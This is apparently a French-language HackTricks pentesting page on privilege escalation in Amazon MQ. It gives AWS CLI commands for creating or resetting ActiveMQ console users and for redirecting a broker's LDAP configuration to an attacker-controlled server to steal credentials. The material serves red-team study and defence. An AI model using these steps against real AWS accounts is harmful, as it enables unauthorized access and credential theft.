AWS - MQ Privesc

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

MQ

Pour plus d’informations sur MQ, consultez :

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Avec ces permissions, vous pouvez créer un nouvel utilisateur dans un broker ActimeMQ (cela ne fonctionne pas avec RabbitMQ) :

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Impact potentiel : Accéder à des informations sensibles en naviguant dans ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Avec ces autorisations, vous pouvez créer un nouvel utilisateur dans un ActimeMQ broker (cela ne fonctionne pas avec RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Impact potentiel : Accéder à des informations sensibles en naviguant dans ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Si un broker utilise LDAP pour l’autorisation avec ActiveMQ, il est possible de modifier la configuration du serveur LDAP utilisĂ© pour le remplacer par un serveur contrĂŽlĂ© par l’attaquant. De cette façon, l’attaquant pourra voler tous les identifiants envoyĂ©s via LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Si vous parveniez d’une maniĂšre ou d’une autre Ă  trouver les credentials originaux utilisĂ©s par ActiveMQ, vous pourriez effectuer un MitM, voler les creds, les utiliser sur le serveur d’origine et renvoyer la rĂ©ponse (peut‑ĂȘtre qu’en rĂ©utilisant simplement les creds volĂ©s vous pourriez faire cela).

Impact potentiel : Voler les identifiants ActiveMQ

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks